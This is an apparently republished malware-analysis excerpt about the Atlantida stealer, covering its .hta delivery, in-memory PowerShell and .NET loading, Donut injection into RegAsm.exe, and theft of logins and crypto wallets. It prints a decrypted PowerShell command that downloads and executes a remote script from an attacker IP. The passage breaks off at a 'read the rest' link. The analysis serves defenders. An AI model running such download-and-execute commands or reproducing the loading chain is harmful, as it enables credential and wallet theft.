Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded.
Atlantida steals a wide range of login information of softwares like Telegram, Steam, several offline cryptocurrency wallets data, browser stored data as well as cryptocurrency wallets browser extension data. It also captures the victim's screen and collects hardware data.
Technical Analysis
Stage 1 - Delivery
The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:
The decrypted command : “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex“ .
Stage 2 - Three levels of in-memory loading
The executed PowerShell command downloads and executes a next stage PowerShell script in memory.
The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:WindowsMicrosoft.NETFrameworkv4.0.30319RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). This technique works by writing a shellcode into the context of another eligible process and creating a thread for that process to run the payload.
Figure 4 - .Net downloader Main functionStage 3 - Atlantida Stealer
The Donut injector is used to ..
Support the originator by clicking the read the rest link below.
